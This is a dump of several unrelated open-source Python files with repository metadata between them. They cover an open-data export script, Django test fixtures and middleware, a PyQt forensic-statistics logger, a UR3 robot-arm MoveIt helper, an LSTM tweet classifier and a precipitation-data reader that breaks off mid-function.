result = [category]
if category == 'locale':
result.append(organization['region'])
if first_word in classification[category].keys():
result.append(classification[category][first_word])
else:
result.append(classification[category]['*']) # first word not recognized.
return result
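# Worked example (hypothetical organization): for {'name': 'comune-di-esempio', 'region': 'lazio'}
# the first word is 'comune' and the presence of the 'region' key marks it as local, so classify()
# returns ['locale', 'lazio', 'comune'].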
def populate_dict(keys_list, dictionary, organization, source):
"""
recursive function that takes a list of keys to be added to a dict of dicts (the dictionary argument).
If the list is empty, it returns the organization argument (the leaf) otherwise it returns a dictionary
created from the nested keys (the branches).
example:
--------
keys_list = ['a', 'b', 'c']
dictionary = {'other':{'nested'}, 'a':{'foo':'bar'}}
organization = {"whatever": "value", "you":"want"}
> populate_dict(keys_list, dictionary, organization)
> {'other':{'nested'}, 'a':{'foo':'bar', 'b':{'c':{"whatever": "value", "you":"want"}}}}
"""
if len(keys_list) == 0:
# time to save the new source
has_organization = False
if not keep_owner:
source.pop('owner_org', None)
# check if organization is already present
for org in dictionary:
if org['name'] == organization['name']:
                # the organization already exists
organization = org
# if the organization is already in the dictionary the 'sources' key has been set
# so it is not necessary to check for its existence
organization['sources'].append(source)
has_organization = True
break
if not has_organization:
# no organization found or dictionary is empty
organization['sources'] = [source]
dictionary.append(organization)
return dictionary
key = keys_list.pop(0)
if key not in dictionary.keys():
if len(keys_list) == 0:
dictionary[key] = populate_dict(keys_list, [], organization, source)
else:
dictionary[key] = populate_dict(keys_list, {}, organization, source)
else:
dictionary[key] = populate_dict(keys_list, dictionary[key], organization, source)
return dictionary
### PARSER
def parse():
"""
the main script
"""
dist_all = {}
dist_nested = {}
for source in pathlib.Path(sources_dir).glob('*.json'):
with source.open('r') as source_file:
source_content = json.load(source_file)
if "config" in source_content:
source_content["config"] = json.loads(source_content["config"])
owner = source_content['owner_org']
try:
with pathlib.Path(orgs_dir, owner+'.json').open('r') as organization:
org_content = json.load(organization)
category = classify(org_content)
dist_nested = populate_dict(category, dist_nested, org_content, source_content)
dist_all[owner] = dist_all.get(owner, dict(org_content, sources=[]))
dist_all[owner]["sources"].append({ k:source_content[k] for k in source_content if keep_owner or source_content[k] != 'owner_org' })
except FileNotFoundError:
print(f"ERROR: file {pathlib.Path(orgs_dir, owner+'.json')} not found or not readable.", file=sys.stderr)
exit(2)
if not dist_nested or not dist_all:
print(f"WARNING: no sources found. Is {pathlib.Path(sources_dir)} the correct folder?", file=sys.stderr)
if to_stdout:
        print(json.dumps(list(dist_all.values()), sort_keys=True, indent=4))
if override or not os.path.exists(dist_filename):
with open(dist_filename, 'w') as output_file:
json.dump(list(dist_all.values()), output_file)
else:
print("ERROR: output file exists and I'm not allowed to overwrite it.", file=sys.stderr)
if override or not os.path.exists(nested_filename):
with open(nested_filename, 'w') as output_file:
json.dump(dist_nested, output_file)
else:
print("ERROR: output file exists and I'm not allowed to overwrite it.", file=sys.stderr)
### THE SCRIPT
if __name__ == '__main__':
parse()
|
italia/public-opendata-sources
|
export_all.py
|
export_all.py
|
py
| 8,264 |
python
|
en
|
code
| 17 |
github-code
|
6
|
2078438087
|
# -*- coding: utf-8 -*-
from django_webtest import DjangoTestApp, WebTestMixin
import pytest
from testapp.articles.factories import AuthorFactory, ArticleFactory, TeamFactory
@pytest.fixture(scope='function')
def app(request):
wtm = WebTestMixin()
wtm._patch_settings()
wtm._disable_csrf_checks()
request.addfinalizer(wtm._unpatch_settings)
return DjangoTestApp()
@pytest.fixture(scope='function')
def data(request):
teams = [
TeamFactory()
for x in range(0, 2)
]
authors = [
AuthorFactory(team=team)
for team in teams
for x in range(0, 5)
]
articles = [
ArticleFactory(author=author)
for author in authors
for x in range(0, 10)
]
return {
'teams': teams,
'authors': authors,
'articles': articles,
}
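# Note on fixture sizes: with the factory counts above, the data fixture returns 2 teams,
# 10 authors (5 per team) and 100 articles (10 per author).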
|
odoku/django-searchview
|
tests/conftest.py
|
conftest.py
|
py
| 846 |
python
|
en
|
code
| 0 |
github-code
|
6
|
16314867701
|
import sqlite3
import sys
import datetime
from collections import defaultdict
from stats_ui_window import Ui_StatWindow
from PyQt5 import QtCore, QtGui, QtWidgets
class MainWindow_EXEC():
def __init__(self):
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
self.ui = Ui_StatWindow()
self.ui.setupUi(MainWindow)
with open('examiners_names.txt','r') as examiners:
for line in examiners.readlines():
self.ui.comboBox.addItem(line.strip())
self.device_list = []
self.ui.pushButton.clicked.connect(self.add_device)
self.ui.pushButton_4.clicked.connect(self.remove_record)
self.ui.pushButton_2.clicked.connect(self.add_list)
self.ui.pushButton_3.clicked.connect(QtCore.QCoreApplication.instance().quit)
MainWindow.show()
sys.exit(app.exec_())
def add_device(self):
device_values = defaultdict()
device_values['case_number'] = self.ui.lineEdit.text()
device_values['item_number'] = self.ui.lineEdit_2.text()
device_values['manufacture'] = self.ui.lineEdit_3.text()
device_values['model_'] = self.ui.lineEdit_4.text()
device_values['crime_code'] = self.ui.lineEdit_6.text()
device_values['requesting'] = self.ui.lineEdit_5.text()
device_values['examiner'] = str(self.ui.comboBox.currentText())
if "" in (device_values['case_number'],device_values['item_number'],
device_values['manufacture'],device_values['model_'],
device_values['crime_code'],device_values['requesting']):
self.error_box()
else:
all_items = True
if self.ui.radioButton_11.isChecked():
device_values['device'] = "Computer"
elif self.ui.radioButton_10.isChecked():
device_values['device'] = "Phone"
elif self.ui.radioButton_12.isChecked():
device_values['device'] = "Hard Drive"
elif self.ui.radioButton_13.isChecked():
device_values['device'] = "Thumbdrive/Media Card"
elif self.ui.radioButton_14.isChecked():
device_values['device'] = "Vehilce"
else:
all_items = False
self.error_box(message = "Please Select Device Type")
if self.ui.radioButton.isChecked():
device_values['security'] = "Password Protected"
elif self.ui.radioButton_9.isChecked():
device_values['security'] = "Unlocked"
else:
all_items = False
self.error_box(message = "Please Select Security")
if self.ui.checkBox_2.isChecked():
device_values['secure_start'] = "Enabled"
else: device_values['secure_start'] = "No"
if self.ui.checkBox_3.isChecked():
device_values['logical'] = "Yes"
else: device_values['logical'] = "No"
if self.ui.checkBox_4.isChecked():
device_values['file_system'] = "Yes"
else: device_values['file_system'] = "No"
if self.ui.checkBox_5.isChecked():
device_values['physical'] = "Yes"
else: device_values['physical'] = "No"
if self.ui.checkBox_8.isChecked():
device_values['lt_greykey'] = "Yes"
else: device_values['lt_greykey'] = "No"
if self.ui.checkBox_6.isChecked():
device_values['greykey'] = "Yes"
else: device_values['greykey'] = "No"
if self.ui.checkBox_7.isChecked():
device_values['no_extraction'] = "No Extraction"
else: device_values['no_extraction'] = "Extracted"
device_values['date'] = datetime.datetime.now().strftime('%m/%d/%Y')
if all_items == True:
self.device_list.append(device_values)
self.ui.tableWidget.insertRow(0)
self.ui.tableWidget.setItem(0 , 0, QtWidgets.QTableWidgetItem(device_values['date']))
self.ui.tableWidget.setItem(0 , 1, QtWidgets.QTableWidgetItem(device_values['device']))
self.ui.tableWidget.setItem(0 , 2, QtWidgets.QTableWidgetItem(device_values['case_number']))
self.ui.tableWidget.setItem(0 , 3, QtWidgets.QTableWidgetItem(device_values['item_number']))
self.ui.tableWidget.setItem(0 , 4, QtWidgets.QTableWidgetItem(device_values['manufacture']))
self.ui.tableWidget.setItem(0 , 5, QtWidgets.QTableWidgetItem(device_values['model_']))
self.ui.lineEdit_2.setText("")
self.ui.lineEdit_3.setText("")
self.ui.lineEdit_4.setText("")
self.ui.checkBox_2.setChecked(False)
self.ui.checkBox_3.setChecked(False)
self.ui.checkBox_4.setChecked(False)
self.ui.checkBox_5.setChecked(False)
self.ui.checkBox_6.setChecked(False)
self.ui.checkBox_7.setChecked(False)
self.ui.checkBox_8.setChecked(False)
else: all_items = True
def remove_record(self):
row = self.ui.tableWidget.currentRow()
self.ui.tableWidget.removeRow(row)
def add_list(self):
manufacture = self.ui.lineEdit_3.text()
if manufacture != "":
self.error_box(message = "Dont forget to add the phone")
else:
self.ui.lineEdit.setText("")
self.ui.lineEdit_2.setText("")
self.ui.lineEdit_3.setText("")
self.ui.lineEdit_4.setText("")
self.ui.lineEdit_6.setText("")
self.ui.lineEdit_5.setText("")
count = self.ui.tableWidget.rowCount()
if count > 0:
self.ui.tableWidget.setRowCount(0)
with open('path.txt','r') as my_path:
path = my_path.read()
con = sqlite3.connect(path)
cur = con.cursor()
for item in self.device_list:
val = (item['date'],item['case_number'],item['item_number'],item['manufacture'],
item['model_'],item['crime_code'],item['requesting'],
item['examiner'],item['device'],item['security'],
item['secure_start'],item['logical'],item['file_system'],
item['physical'],item['lt_greykey'],item['greykey'],item['no_extraction'])
sql = "INSERT INTO entries (date,case_number,item_number,manufacture,model_,crime_code,requesting,examiner,device,security,secure_start,logical,file_system,physical,lt_greykey,greykey,no_extraction) VALUES (?,?, ?, ?, ?, ?, ?, ?,?, ?,?,?,?,?,?,?,?)"
cur.execute(sql,val)
con.commit()
con.close()
@staticmethod
def error_box(message = 'Please fill out all fields!'):
error_dialog = QtWidgets.QMessageBox()
error_dialog.setIcon(QtWidgets.QMessageBox.Warning)
error_dialog.setWindowTitle('Error')
error_dialog.setText(f'{message}')
error_dialog.setStandardButtons(QtWidgets.QMessageBox.Close)
error_dialog.exec()
if __name__ == "__main__":
MainWindow_EXEC()
|
chrisw706/examination_stats
|
Stats/Python/Stats.py
|
Stats.py
|
py
| 7,488 |
python
|
en
|
code
| 0 |
github-code
|
6
|
33595344312
|
from django.http import JsonResponse
from base.views import chekctoken
WHITE_URLS = ('/apis/login/',)
class RequestMideleware(object):
def process_request(self, request):
if request.path_info in WHITE_URLS:
return
try:
ret = chekctoken(request)
if not ret:
response =JsonResponse({'result': 'Unauthorized'})
response.status_code = 401
return response
except:
return
|
Hchenwy/web
|
www/server/base/middleware.py
|
middleware.py
|
py
| 514 |
python
|
en
|
code
| 0 |
github-code
|
6
|
24961044066
|
#!/usr/bin/env python
from std_msgs.msg import String
from math import pi
from sensor_msgs.msg import PointCloud2
import rospy
import sensor_msgs.point_cloud2 as pc2
import ros_numpy
import numpy as np
import sys
import copy
import moveit_commander
import moveit_msgs.msg
import geometry_msgs.msg
# UR Robot
robot = None
group = None
scene = None
display_trajectory_publisher = None
init_pose = (-0.2784,0.092,0.42,0.073,0.695,0.711,0.0717)
capture_ready = False
# UR Robot initialization
def ur3_init():
global robot,group,scene,display_trajectory_publisher
## First initialize moveit_commander and rospy.
#print "============ Starting system"
moveit_commander.roscpp_initialize(sys.argv)
#rospy.init_node('move_group_python_interface_tutorial',
# anonymous=True)
## Instantiate a RobotCommander object. This object is an interface to
## the robot as a whole.
robot = moveit_commander.RobotCommander()
## Instantiate a PlanningSceneInterface object. This object is an interface
## to the world surrounding the robot.
scene = moveit_commander.PlanningSceneInterface()
## Instantiate a MoveGroupCommander object. This object is an interface
## to one group of joints. In this case the group is the joints in the ur3
## arm. This interface can be used to plan and execute motions on the ur3
## arm.
group = moveit_commander.MoveGroupCommander("ur3")
## We create this DisplayTrajectory publisher which is used below to publish
## trajectories for RVIZ to visualize.
display_trajectory_publisher = rospy.Publisher(
'/move_group/display_planned_path',
moveit_msgs.msg.DisplayTrajectory)
# Set robot goal based on end_effector
def ur3_set_end_effector_goal_quat(pos_x,pos_y,pos_z,qx,qy,qz,qw):
global robot,group,scene,display_trajectory_publisher
current_pose = group.get_current_pose().pose
#print ("Original Pose Information")
#print (current_pose)
# XYZ are in terms of meters
x = 0
y = 0
z = 0
#Yaw,pitch and roll should be in degree
# They are all relative to base link coorindates
roll = 10
yaw = 183
pitch = 180
pose_goal = geometry_msgs.msg.Pose()
#Q = euler_to_quaternion(yaw , pitch, roll)
#print Q
pose_goal.orientation.x = qx
pose_goal.orientation.y = qy
pose_goal.orientation.z = qz
pose_goal.orientation.w = qw
pose_goal.position.x = pos_x
pose_goal.position.y = pos_y
pose_goal.position.z = pos_z
group.set_pose_target(pose_goal)
plan = group.go(wait=True)
group.stop()
current_pose = group.get_current_pose().pose
#print ("------------ Target Pose Information ------------")
#print (current_pose)
group.clear_pose_targets()
#print ("[INFO] Goal of end effector is arrived")
|
vincent51689453/ur3_edge_follower
|
src/edge_follower/ur_robot.py
|
ur_robot.py
|
py
| 2,802 |
python
|
en
|
code
| 0 |
github-code
|
6
|
9137033058
|
import os
import pandas as pd
from scipy.io import loadmat
def load_data():
list_of_files = os.listdir("data\\Identification\\MFCC\\")
cumulative_df = pd.DataFrame()
for file in list_of_files:
data_set = loadmat("data\\Identification\\MFCC\\" + file)
features = data_set['feat']
labels = data_set['Y']
features_df = pd.DataFrame(features)
labels_df = pd.DataFrame(labels, columns=["Subject", "Session"])
combined_df = pd.concat([features_df, labels_df], axis=1)
cumulative_df = pd.concat(
[cumulative_df, combined_df]).sort_values(by="Subject")
return cumulative_df
def load_file(filename):
data_set = loadmat("data\\Identification\\MFCC\\" + str(filename))
features = data_set['feat']
labels = data_set['Y']
features_df = pd.DataFrame(features)
labels_df = pd.DataFrame(labels, columns=["Subject", "Session"])
combined_df = pd.concat([features_df, labels_df], axis=1)
return combined_df
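# Usage sketch (file name is illustrative only): a single session can be loaded with
#   df = load_file("subject01_session1.mat")
# while load_data() concatenates every .mat file found under data\Identification\MFCC\.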
|
PGG106/ReadMat
|
utils.py
|
utils.py
|
py
| 1,004 |
python
|
en
|
code
| 0 |
github-code
|
6
|
37188371889
|
import os
import csv
import math
import numpy as np
import nltk
from nltk.corpus import stopwords
import collections
import string
import re
from sklearn.model_selection import KFold
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import LSTM
from keras.layers.embeddings import Embedding
from keras.preprocessing import sequence
from keras.preprocessing.text import Tokenizer
import time
cachedStopWords = stopwords.words("english")
if __name__ == '__main__':
print("Starting Main")
startTime = time.time()
x = []
y = []
fraud = []
radical = []
violence = []
with open("annotPart1.csv",'r', encoding="utf8") as csvFile:
reader = csv.reader(csvFile)
p = 0
for row in reader:
if(len(row) == 5 and p != 0):
x.append(row[1])
temp = []
temp.append(0 if row[2] == '0' else 1)
temp.append(0 if row[3] == '0' else 1)
temp.append(0 if row[4] == '0' else 1)
fraud.append(0 if row[2] == '0' else 1)
radical.append(0 if row[3] == '0' else 1)
violence.append(0 if row[4] == '0' else 1)
y.append(temp)
p = p + 1
csvFile.close
with open("annot_part2.csv",'r', encoding="utf8") as csvFile:
reader = csv.reader(csvFile)
p = 0
for row in reader:
if(len(row) == 5 and p != 0):
x.append(row[1])
temp = []
temp.append(0 if row[2] == '0' else 1)
temp.append(0 if row[3] == '0' else 1)
temp.append(0 if row[4] == '0' else 1)
fraud.append(0 if row[2] == '0' else 1)
radical.append(0 if row[3] == '0' else 1)
violence.append(0 if row[4] == '0' else 1)
y.append(temp)
p = p + 1
csvFile.close
print("Size of x:",len(x)," Size of y:",len(y))
X = []
for t in x:
t = re.sub(r'[^\w\s]',' ',t)
t = ' '.join([word for word in t.split() if word != " "])
t = t.lower()
t = ' '.join([word for word in t.split() if word not in cachedStopWords])
X.append(t)
print("Type of X:",type(X))
Features = X
Fraud = fraud
Radical = radical
Violence = violence
kf = KFold(n_splits=10)
iteration = 0
gFraudAccu = 0
gRadicalAccu = 0
gViolenceAccu = 0
gTotalAccu = 0
vocabSize = 50000
tokenizer = Tokenizer(num_words= vocabSize)
tokenised = tokenizer.fit_on_texts(X)
for train_index, test_index in kf.split(Features):
iteration += 1
print("\n\n\n\nMaking nueral Network for iteration:",iteration)
iterStart = time.time()
#Making Training and Testing Data
X_Train = [Features[x] for x in train_index]
X_Test = [Features[x] for x in test_index]
fraudTrain = [Fraud[x] for x in train_index]
fraudTest = [Fraud[x] for x in test_index]
radicalTrain = [Radical[x] for x in train_index]
radicalTest = [Radical[x] for x in test_index]
violenceTrain = [Violence[x] for x in train_index]
violenceTest = [Violence[x] for x in test_index]
tokenisedTrain = tokenizer.texts_to_sequences(X_Train)
tokenisedTest = tokenizer.texts_to_sequences(X_Test)
max_review_length = 180
X_Train = sequence.pad_sequences(tokenisedTrain, maxlen=max_review_length,padding='post')
X_Test = sequence.pad_sequences(tokenisedTest, maxlen=max_review_length,padding='post')
#Fraud
fraudModel = Sequential()
fraudModel.add(Embedding(50000, 100, input_length=max_review_length))
fraudModel.add(LSTM(100, dropout=0.2, recurrent_dropout=0.2))
fraudModel.add(Dense(1, activation='sigmoid'))
fraudModel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
fraudModel.fit(X_Train,fraudTrain,epochs=10, batch_size=100)
fraudScore = fraudModel.evaluate(X_Test,fraudTest,verbose = 100)
accuFraudLstm = fraudScore[1]
fraudEndTime = time.time()
print("\nFraud Training Done for Iteration",iteration,"\nTime:",fraudEndTime - iterStart)
positiveFraud = [x for x in fraudTest if x == 1]
print("Number of positive Examples : ",len(positiveFraud), " ratio : ", (len(positiveFraud) / len(fraudTest)) )
#Radical
radicalModel = Sequential()
radicalModel.add(Embedding(50000, 100, input_length=max_review_length))
radicalModel.add(LSTM(100, dropout=0.2, recurrent_dropout=0.2))
radicalModel.add(Dense(1, activation='sigmoid'))
radicalModel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
radicalModel.fit(X_Train,radicalTrain,epochs=10, batch_size=100)
radicalScore = radicalModel.evaluate(X_Test,radicalTest,verbose = 100)
accuRadicalLstm = radicalScore[1]
radicalEndTime = time.time()
print("\nRadical Training Done for Iteration",iteration,"\nTime:",radicalEndTime - fraudEndTime)
positiveRadical = [x for x in radicalTest if x == 1]
print("Number of positive Examples : ",len(positiveRadical), " ratio : ", (len(positiveRadical) / len(radicalTest)) )
#Violence
violenceModel = Sequential()
violenceModel.add(Embedding(50000, 100, input_length=max_review_length))
violenceModel.add(LSTM(100, dropout=0.2, recurrent_dropout=0.2))
violenceModel.add(Dense(1, activation='sigmoid'))
violenceModel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
violenceModel.fit(X_Train,violenceTrain,epochs=10, batch_size=100)
violenceScore = violenceModel.evaluate(X_Test,violenceTest,verbose = 100)
accuViolenceLstm = violenceScore[1]
violenceEndTime = time.time()
print("\nViolence Training Done for Iteration",iteration,"\nTime:",violenceEndTime - radicalEndTime)
positiveViolence = [x for x in violenceTest if x == 1]
print("Number of positive Examples : ",len(positiveViolence), " ratio : ", (len(positiveViolence) / len(violenceTest)) )
totalAccu = (accuViolenceLstm + accuRadicalLstm + accuFraudLstm) / 3
gFraudAccu += accuFraudLstm
gViolenceAccu += accuViolenceLstm
gRadicalAccu += accuRadicalLstm
gTotalAccu += totalAccu
iterEndTime = time.time()
print("\n\nAccuracyScores for LSTM Iteration:",iteration,"\nFraud: ",accuFraudLstm,"\nRadical: ",accuRadicalLstm,"\nViolence: ",accuViolenceLstm,"\nTotal Accuracy:",totalAccu,"\nTotal Time:",iterEndTime - iterStart)
gFraudAccu /= 10
gViolenceAccu /= 10
gRadicalAccu /= 10
gTotalAccu /= 10
endTime = time.time()
print("\n\n\n\nOverall AccuracyScores for LSTM :","\nFraud: ",gFraudAccu,"\nRadical: ",gRadicalAccu,"\nViolence: ",gViolenceAccu,"\nTotal Accuracy:",gTotalAccu,"\nTime:",endTime - startTime)
|
arinjayakhare1/Real-Time-Tweet-Classifier-using-RLAN
|
test/old codes/testWithThreads/initTrainer/old Programs/initTrainer.py
|
initTrainer.py
|
py
| 6,270 |
python
|
en
|
code
| 0 |
github-code
|
6
|
11706943391
|
from string import ascii_lowercase, ascii_uppercase
from utils.data import read_data_as_list
characters = list(ascii_lowercase) + list(ascii_uppercase)
priority_lookup = dict(zip(characters, range(1, len(characters) + 1)))
rucksacks = read_data_as_list(day=3)
# Part 1
total = 0
for rucksack in rucksacks:
midpoint = len(rucksack) // 2
compartment_1, compartment_2 = rucksack[:midpoint], rucksack[midpoint:]
common_item = set(compartment_1).intersection(compartment_2).pop()
priority = priority_lookup[common_item]
total += priority
print(f'Part 1 Solution: {total}')
# Part 2
total = 0
for i in range(0, len(rucksacks), 3):
rucksack_1, rucksack_2, rucksack_3 = rucksacks[i: i+3]
common_item = set(rucksack_1).intersection(rucksack_2).intersection(rucksack_3).pop()
priority = priority_lookup[common_item]
total += priority
print(f'Part 2 Solution: {total}')
|
stuartjwright/advent_of_code_2022
|
day_03.py
|
day_03.py
|
py
| 902 |
python
|
en
|
code
| 0 |
github-code
|
6
|
73499996027
|
import numpy as np
from numpy import ma
import xarray as xr
from netCDF4 import Dataset
import struct
import sys
import os
import datetime as dt
import glob
"""
This module contains functions for reading external data
to use with LPT.
The data_read_function is called at various points in other LPT functions.
To add a new data set, do the following:
1) Write a read function similar to read_generic_netcdf below.
2) Add an "elif" option that calls that function in readdata
"""
################################################################################
def readdata(datetime_to_read, dataset_options_dict, verbose=None):
"""
Main data read function. Get data at datetime datetime_to_read.
Based on the oprions in dataset_options_dict, it will look in the data directory
and use the rain function specified below.
To add a dataset type, add an elif block to this function.
The function is expected to return a dictionary with keys 'lon', 'lat', and 'data'
Verbose option (new 05/2023):
- If set to None (default), it will use the verbose option from dataset_options_dict.
- Otherwise, the value will be used *instead of* dataset_options_dict.
This allows a function call to override the setting in dataset_options_dict.
"""
## Manage verbose
if verbose is None:
verbose_actual = dataset_options_dict['verbose']
else:
verbose_actual = verbose
if dataset_options_dict['raw_data_format'] == 'generic_netcdf':
variable_names = (dataset_options_dict['longitude_variable_name']
, dataset_options_dict['latitude_variable_name']
, dataset_options_dict['field_variable_name'])
DATA = read_generic_netcdf_at_datetime(datetime_to_read
, variable_names = variable_names
, data_dir = dataset_options_dict['raw_data_parent_dir']
, fmt = dataset_options_dict['file_name_format']
, verbose = verbose_actual)
elif dataset_options_dict['raw_data_format'] == 'generic_netcdf_with_multiple_times':
variable_names = (dataset_options_dict['longitude_variable_name']
, dataset_options_dict['latitude_variable_name']
, dataset_options_dict['time_variable_name']
, dataset_options_dict['field_variable_name'])
DATA = read_generic_netcdf_at_datetime(datetime_to_read
, variable_names = variable_names
, dt_to_use = datetime_to_read
, data_dir = dataset_options_dict['raw_data_parent_dir']
, fmt = dataset_options_dict['file_name_format']
, verbose = verbose_actual)
elif dataset_options_dict['raw_data_format'] == 'cmorph':
DATA = read_cmorph_at_datetime(datetime_to_read
, area = dataset_options_dict['area']
, data_dir = dataset_options_dict['raw_data_parent_dir']
, fmt = dataset_options_dict['file_name_format']
, verbose = verbose_actual)
elif dataset_options_dict['raw_data_format'] == 'imerg_hdf5':
DATA = read_imerg_hdf5_at_datetime(datetime_to_read
, area = dataset_options_dict['area']
, data_dir = dataset_options_dict['raw_data_parent_dir']
, fmt = dataset_options_dict['file_name_format']
, verbose = verbose_actual)
elif dataset_options_dict['raw_data_format'] == 'cfs_forecast':
fcst_hour = int((datetime_to_read - dataset_options_dict['datetime_init']).total_seconds()/3600)
fcst_resolution_hours = dataset_options_dict['data_time_interval']
if fcst_hour < 1: # There is no data in the file for fcst = 0. Use 6h fcst values.
records = [1,]
else:
records = [int(fcst_hour/fcst_resolution_hours),]
DATA = read_cfs_rt_at_datetime(dataset_options_dict['datetime_init'] # datetime_to_read
, data_dir = dataset_options_dict['raw_data_parent_dir']
, fmt = dataset_options_dict['file_name_format']
, records = records
, verbose = verbose_actual)
DATA['data'] = ma.masked_array(DATA['precip'][0])
## -- Add an elif block here for new datasets. --
else:
print(('ERROR! '+dataset_options_dict['raw_data_format'] + ' is not a valid raw_data_format!'), flush=True)
DATA = None
return DATA
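## Hypothetical sketch (not part of the original module): following the two steps in the module
## docstring, a new dataset would get its own read function plus an elif branch in readdata(), e.g.
##
##   elif dataset_options_dict['raw_data_format'] == 'my_new_format':
##       DATA = read_my_new_format_at_datetime(datetime_to_read
##           , data_dir = dataset_options_dict['raw_data_parent_dir']
##           , fmt = dataset_options_dict['file_name_format']
##           , verbose = verbose_actual)
##
## where read_my_new_format_at_datetime() returns a dict with 'lon', 'lat' and 'data' keys, like the
## readers below. The format name and function name here are illustrative only.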
################################################################################
## Read functions for generic NetCDF data.
################################################################################
def read_generic_netcdf(fn, variable_names=('lon','lat','rain'), dt_to_use=None):
"""
DATA = read_generic_netcdf(fn)
output is like this:
list(DATA)
Out[12]: ['lon', 'lat', 'precip']
In [21]: DATA['lon'].shape
Out[21]: (1440,)
In [22]: DATA['lat'].shape
Out[22]: (400,)
In [23]: DATA['precip'].shape
Out[23]: (400, 1440)
"""
DATA = {}
with xr.open_dataset(fn) as DS:
DATA['lon'] = DS[variable_names[0]].values
DATA['lat'] = DS[variable_names[1]].values
## If no time variable, just retrieve the 2-D data as it is.
if not dt_to_use is None: #'time' in list(DS.variables):
DATA['data'] = DS.sel({variable_names[2]:str(dt_to_use)},method='nearest')[variable_names[3]].values
else:
DATA['data'] = DS[variable_names[2]].values
DATA['data'] = np.ma.masked_array(DATA['data'], mask=np.isnan(DATA['data']))
## Need to get from (-180, 180) to (0, 360) longitude.
lon_lt_0, = np.where(DATA['lon'] < -0.0001)
lon_ge_0, = np.where(DATA['lon'] > -0.0001)
if len(lon_lt_0) > 0:
DATA['lon'][lon_lt_0] += 360.0
DATA['lon'] = np.concatenate((DATA['lon'][lon_ge_0], DATA['lon'][lon_lt_0]))
DATA['data'] = np.concatenate((DATA['data'][:,lon_ge_0], DATA['data'][:,lon_lt_0]), axis=1)
return DATA
def read_generic_netcdf_at_datetime(dt, data_dir='.'
, variable_names=('lon','lat','rain'), dt_to_use=None, fmt='gridded_rain_rates_%Y%m%d%H.nc'
, verbose=False):
fn = (data_dir + '/' + dt.strftime(fmt))
DATA=None
if not os.path.exists(fn):
print('File not found: ', fn)
else:
if verbose:
print(fn)
DATA=read_generic_netcdf(fn,
variable_names = variable_names,
dt_to_use = dt_to_use)
return DATA
################################################################################
## Read functions for specific datasets.
################################################################################
"""
CMORPH reading functions.
"""
def read_cmorph_rt_bin(fn, area=[0,360,-90,90]):
"""
DATA = read_cmorph_rt_bin(fn)
DATA is a dict with keys lon, lat, and precip.
CMORPH RT files are binary.
The GrADS control file below is used as the basis for this function:
DSET ^../%y4/%y4%m2/CMORPH_V0.x_RT_8km-30min_%y4%m2%d2%h2
OPTIONS little_endian template
UNDEF -999.0
TITLE CMORPH Rain Rate (Real-Time Version)
XDEF 4948 LINEAR 0.0363783345 0.072756669
YDEF 1649 LINEAR -59.963614312 0.072771376
ZDEF 1 LEVELS 1
TDEF 99999 LINEAR 00:00z01Jan2017 30mn
VARS 1
cmorph 1 99 CMORPH Rain Rate [mm/hr]
ENDVARS
"""
dtype=np.dtype([('field1', '<i2')])
DATA={}
DATA['lon'] = np.arange(0.0363783345, 360.0, 0.072756669)
DATA['lat'] = np.arange(-59.963614312, 60.0, 0.072771376)
fid = open(fn,'rb')
## GrADS uses FORTRAN REAL values, which is np.float32 for Python.
DATA['data'] = np.fromfile(fid, dtype=np.float32, count=2*4948*1649)
if sys.byteorder == 'big': # Data is little endian.
DATA['data'] = DATA['data'].byteswap()
## Shape and scale the data.
DATA['data'] = np.reshape(np.double(DATA['data']), [2, 1649, 4948])
DATA['data'][DATA['data'] < -0.001] = 0.0 # Usually, missing high latitude data.
fid.close()
## Cut out area.
keep_lon, = np.where(np.logical_and(DATA['lon'] > area[0], DATA['lon'] < area[1]))
keep_lat, = np.where(np.logical_and(DATA['lat'] > area[2], DATA['lat'] < area[3]))
DATA['lon'] = DATA['lon'][keep_lon[0]:keep_lon[-1]+1]
DATA['lat'] = DATA['lat'][keep_lat[0]:keep_lat[-1]+1]
DATA['data'] = DATA['data'][:, keep_lat[0]:keep_lat[-1]+1, keep_lon[0]:keep_lon[-1]+1]
DATA['data'] = 0.5*(DATA['data'][0,:,:] + DATA['data'][1,:,:])
return DATA
def read_cmorph_at_datetime(dt_this, force_rt=False, data_dir='.'
, fmt='CMORPH_V0.x_RT_8km-30min_%Y%m%d%H'
, verbose=False, area=[0,360,-90,90]):
"""
DATA = read_cmorph_at_datetime(dt, force_rt=False, verbose=False)
DATA is a dict with keys lon, lat, and precip.
Based on the provided datetime dt, read in the CMORPH data.
By default, it will first check for the research product,
and use the realtime product if the research product was not found.
However, if force_rt = True, it just uses the realtime product.
"""
## First try research product
fn = (data_dir + '/' + dt_this.strftime(fmt))
if verbose:
print(fn)
DATA = read_cmorph_rt_bin(fn, area=area)
DATA['data'] = ma.masked_array(DATA['data'])
return DATA
def read_imerg_hdf5_at_datetime(dt_this, force_rt=False, data_dir='.'
, fmt='%Y/%m/%d/3B-HHR.MS.MRG.3IMERG.%Y%m%d-S%H*.HDF5'
, verbose=False, area=[0,360,-90,90]):
"""
DATA = read_imerg_hdf5_at_datetime(dt_this, force_rt=False, data_dir='.'
, fmt='%Y/%m/%d/3B-HHR.MS.MRG.3IMERG.%Y%m%d-S%H*.HDF5'
, verbose=False, area=[0,360,-90,90])
DATA is a dict with keys lon, lat, and precip.
Based on the provided datetime dt, read in the IMERG HDF data.
By default, it will first check for the final product,
and use the "late" realtime product if the final product was not found.
However, if force_rt = True, it just uses the "late" realtime product.
(It will search for a filename with modified fmt to check for "late" product
- append 'late/' to the front of the directory path.
- replace '3B-HHR' with '3B-HHR-L').
"""
fn_list = sorted(glob.glob(data_dir + '/' + dt_this.strftime(fmt)))
if len(fn_list) < 1:
if not force_rt:
## Try "late" realtime data.
print('Final data version not found. Trying to use late realtime data instead.')
fmt_rt = 'late/' + fmt.replace('3B-HHR','3B-HHR-L')
fn_list = sorted(glob.glob(data_dir + '/' + dt_this.strftime(fmt_rt)))
if len(fn_list) < 1:
print('WARNING: No input data found.')
fn = fn_list[0]
if verbose:
print(fn)
with Dataset(fn) as DS:
lon_rain = DS['Grid']['lon'][:]
lat_rain = DS['Grid']['lat'][:]
rain = DS['Grid']['precipitationCal'][:][0].T
if len(fn_list) > 1:
fn = fn_list[1]
if verbose:
print(fn)
with Dataset(fn) as DS:
rain30 = DS['Grid']['precipitationCal'][:][0].T
